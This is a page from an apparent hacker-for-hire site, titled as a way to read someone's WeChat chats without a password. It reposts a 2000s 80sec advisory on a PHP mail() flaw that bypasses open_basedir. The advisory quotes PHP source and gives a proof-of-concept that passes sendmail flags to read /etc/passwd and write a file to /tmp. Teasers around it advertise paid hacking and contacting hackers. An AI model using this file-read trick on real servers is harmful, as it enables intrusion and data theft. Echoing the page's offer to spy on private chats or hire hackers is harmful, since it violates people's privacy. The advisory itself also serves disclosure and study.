找黑客平台

怎么看到别人微信聊天记录 不微信密码,可以看到

访客4年前黑客文章655

漏洞介绍:php是一款被广泛使用的编程语言,可以被嵌套在html里用做web程序开发,但是80sec发现在php的Mail函数设计上存在问题,可能导致绕过其他的如open_basedir等限制以httpd进程的身份读写任意文件,结合应用程序上下文也可能导致文件读写漏洞。漏洞分析:php的Mail函数在php源码里以如下形式实现: Php 代码复制代码 ...... if(PG(safe_mode)&&(ZEND_NUM_ARGS()==5)){ php_error_docref(NULLTSRMLS_CC,E_WARNING,"SAFEMODERestrictionineffect.ThefifthparameterisdisabledinSAFEMODE."); RETURN_FALSE; } if(zend_parse_parameters(ZEND_NUM_ARGS()TSRMLS_CC,"sss|ss", &to,&to_len, &subject,&subject_len, &message,&message_len, &headers,&headers_len, &extra_cmd,&extra_cmd_len )==FAILURE){ return; } ...... if(force_extra_parameters){ extra_cmd=estrdup(force_extra_parameters); }elseif(extra_cmd){ extra_cmd=php_escape_shell_cmd(extra_cmd); } if(php_mail(to_r,subject_r,message,headers,extra_cmdTSRMLS_CC)){ RETVAL_TRUE; }else{ RETVAL_FALSE; } ..... ...... if (PG(safe_mode) && (ZEND_NUM_ARGS() == 5)) { php_error_docref(NULL TSRMLS_CC, E_WARNING, "SAFE MODE Restriction in effect. The fifth parameter is disabled in SAFE MODE."); RETURN_FALSE; } if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sss|ss", &to, &to_len, &subject, &subject_len, &message, &message_len, &headers, &headers_len, &extra_cmd, &extra_cmd_len ) == FAILURE) { return; } ...... if (force_extra_parameters) { extra_cmd = estrdup(force_extra_parameters); } else if (extra_cmd) { extra_cmd = php_escape_shell_cmd(extra_cmd); } if (php_mail(to_r, subject_r, message, headers, extra_cmd TSRMLS_CC)) { RETVAL_TRUE; } else { RETVAL_FALSE; } ..... 在php_mail中 Php 代码复制代码 PHPAPIintphp_mail(char*to,char*subject,char*message,char*headers,char*extra_cmdTSRMLS_DC) { .... FILE*sendmail; intret; char*sendmail_path=INI_STR("sendmail_path"); char*sendmail_cmd=NULL; .... if(extra_cmd!=NULL){ sendmail_cmd=emalloc(strlen(sendmail_path)+strlen(extra_cmd)+2); strcpy(sendmail_cmd,sendmail_path); strcat(sendmail_cmd,""); strcat(sendmail_cmd,extra_cmd); }else{ sendmail_cmd=sendmail_path; } .... /*Sincepopen()doesn'tindicateiftheinternalfork()doesn'twork *(e.g.theshellcan'tbeexecuted)weexplicitelysetitto0tobe *surewedon'tcatchanyoldererrnovalue.*/ errno=0; sendmail=popen(sendmail_cmd,"w"); PHPAPI int php_mail(char *to, char *subject, char *message, char *headers, char *extra_cmd TSRMLS_DC) { .... FILE *sendmail; int ret; char *sendmail_path = INI_STR("sendmail_path"); char *sendmail_cmd = NULL; .... if (extra_cmd != NULL) { sendmail_cmd = emalloc (strlen (sendmail_path) + strlen (extra_cmd) + 2); strcpy (sendmail_cmd, sendmail_path); strcat (sendmail_cmd, " "); strcat (sendmail_cmd, extra_cmd); } else { sendmail_cmd = sendmail_path; } .... /* Since popen() doesn't indicate if the internal fork() doesn't work * (e.g. the shell can't be executed) we explicitely set it to 0 to be * sure we don't catch any older errno value. */ errno = 0; sendmail = popen(sendmail_cmd, "w"); 如果是Linux系统,Mail函数将拼接INI_STR(”sendmail_path”)的内容和额外的参数来执行命令,但是额外的参数在拼接之前经过php_escape_shell_cmd的处理,所以我们无法执行额外的命令。但是通过查阅sendmail自身的命令帮助,我们可以发现sendmail的某些参数是可以用来读写文件的,利用这个特性如果我们控制第5个参数的时候我们一样可以获得对文件系统的读写权限并且不受open_basedir等限制。 漏洞测试: Php 代码复制代码 <?php $to='jianxin&80sec.com'.str_repeat("x",10000); $subject='thesubject'.str_repeat("x",10); $message='hello'.str_repeat("x",10); mail($to,$subject,$message,$headers,"-v-bt-X/tmp/80sec-d13-C/etc/passwd"); ?> <?php $to = 'jianxin@80sec.com'.str_repeat("x",10000); $subject = 'the subject'.str_repeat("x",10); $message = 'hello'.str_repeat("x",10); mail($to, $subject, $message, $headers,"-v -bt -X /tmp/80sec -d13 -C /etc/passwd"); ?> 本站内容均为原创,转载请务必保留署名与链接!php mail function open_basedir bypass:http://www.80sec.com/php-mail-function-open_basedir-bypass.html

返回列表

上一篇:关于 SaaS 产品模块迭代的复盘与感悟

下一篇:俄媒:俄反对派人士纳瓦利内住院期间曾与德总

相关文章

“凡尔赛文学”是奢侈品电商的“取款机”?

“凡尔赛文学”是奢侈品电商的“取款机”?

编辑导读:凡尔赛文学是在社交网络鼓起的一种文体,即以看似不经意的口气吐槽糊口,实则低调地炫富。凡尔赛文学背后埋没着了用户奈何的心理?对奢侈品电商来说,它会是助推用户消费的重要因素吗?本文对此展开了阐明...

中国最贵的香烟?中国十大顶级香烟价格

中国最贵的香烟?中国十大顶级香烟价格

1 利群—富春山居 20000元/条   2 和天下—尊尚5000 14000元/条   3 泰山—拂光 锡罐 12000元/条   4 金圣—智圣出山 100...

伪装怎么画(qq红包伪装怎么画才能识别)

伪装怎么画(qq红包伪装怎么画才能识别) 当大家满心欢喜地收到一个QQ红包,竟然要让我画伪装,究竟是什么鬼,qq红包伪装究竟怎么画,我们一起来看一下吧。 画QQ红包图片专业画家(小编我自己)上线了...

皮卡堂怎么赚钱?皮卡堂教跑服赚钱

皮卡堂怎么赚钱?皮卡堂教跑服赚钱

皮卡堂怎么快速赚钱?皮卡堂怎么赚钱?今天安趣网小编来给大家分享一下皮卡堂赚钱技巧。下面就让我们来看看皮卡堂都有哪些赚钱方法吧! 赚钱: 1、卖花 2、开宝箱 3、开牧场 4、做任务刚开始...

求黑客联系方式官网(中国黑客高手 详细资料 联系方式)

一、求黑客联系方式官网(中国黑客高手 详细资料 联系方式) 1、有没有人知道一个红客或黑客的联系方式如果你有什么需要帮助的,找一个红客或黑客的论坛或贴吧,发个帖子,不是什么特殊问题的话,一般会有人帮...

免费黑客接单_广东一夫妻联系黑客-哪有黑客找黑客

「免费黑客接单_广东一夫妻联系黑客-哪有黑客找黑客」定论首要思考问题,怎么绕过union select以及select from? 一旦exploit.rtf与CVE-2019-0199_POC...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.